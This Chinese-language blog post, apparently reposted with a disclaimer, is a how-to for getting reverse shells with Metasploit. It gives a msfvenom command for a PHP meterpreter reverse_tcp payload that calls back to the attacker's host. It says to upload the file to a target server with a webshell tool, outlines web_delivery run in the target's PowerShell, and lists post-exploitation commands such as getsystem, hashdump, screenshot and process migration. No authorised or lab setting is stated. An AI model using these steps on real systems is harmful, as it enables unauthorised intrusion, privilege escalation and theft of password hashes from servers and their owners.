msf反彈shell


今天回顧了一下msf反彈shell的操作,在這里做一下記錄和分享。( ̄︶ ̄)↗

 

反彈shell的兩種方法

 

 第一種Msfvenom實例:

1、msfconsole    #啟動msf

2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php    #生成反彈shell文件

LHOST表示本地攻擊機的ip, LPORT表示本地攻擊機的端口。

其他msf下的各種生成payload命令可參考https://www.cnblogs.com/backlion/p/6000544.html

這樣我們就成功生成了一個shell.php文件。

3、接下來我們需要在本機中監聽4444端口。

這就表示開始本機開始監聽4444端口了。

4、現在把shell.php文件通過菜刀上傳至目標服務器中,然后本地游覽器訪問shell.php

 即可以看見成功返回了一個session

sessions -i     #查看當前可用會話

 

 第二種web_delivery實例流程:

 1、msfconsole    #啟動msf

2、show options    #目的是看exploit target為什么腳本

這里默認為pyhton,需要更改為php

show payloads    #挑選payload,選擇php/meterpreter/reverse_tcp

然后設置lhost

得到一段腳本,將這段腳本在目標機的powershell中執行即可反彈shell。

 

下面貼一些常用的命令:

基礎命令:
seach cve-2017-7494                            #查看是否存在指定漏洞
use exploit/multi/handler                        #使用exploit/multi/handler模塊
info                                                         #查看信息
show options                  #查看exp的參數  rhost 是遠程主機地址  lhost是本地主機地址
back                                                       #返回上一級
session -i                                                #查看當前可用會話
sessions -i x                                           #切換至會話x
session -k                                               #殺死所有活躍會話
background                                            #將會話放到后台
route                     #查看被控主機路由表
sysinfo                       #查看系統信息
run post/windows/gather/checkvm         #檢查是否在虛擬機上運行
idletime                    #查看運行時間
getuid                                              #獲得運行Meterpreter會話的用戶名,從而查看當前會話具有的權限
getsystem                                         #通過各種攻擊向量來提升到系統用戶權限
getwd pwd                                        #shell處於靶機的目錄
getlwd                                               #本地的目錄位置
hashdump                                         #導出目標主機中的口令哈希值
screenshot                                       #對目標主機的屏幕進行截圖
backgroud                                        #將當前Meterpreter shell轉為后台執行
quit                                                  #關閉當前Meterpreter會話,返回MSF終端    
ps                                                       #顯示所有運行進程以及管聯的用戶賬戶
migrate PID                                      #遷移到一個指定的進程PID
post/windows/manage/migrate                                  #會自動尋找合適的進程進行遷移
execute -f cmd.exe -i                       #執行cmd.exe命令並進行交互
shell                                                    #以所有可用令牌來運行一個交互的shell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM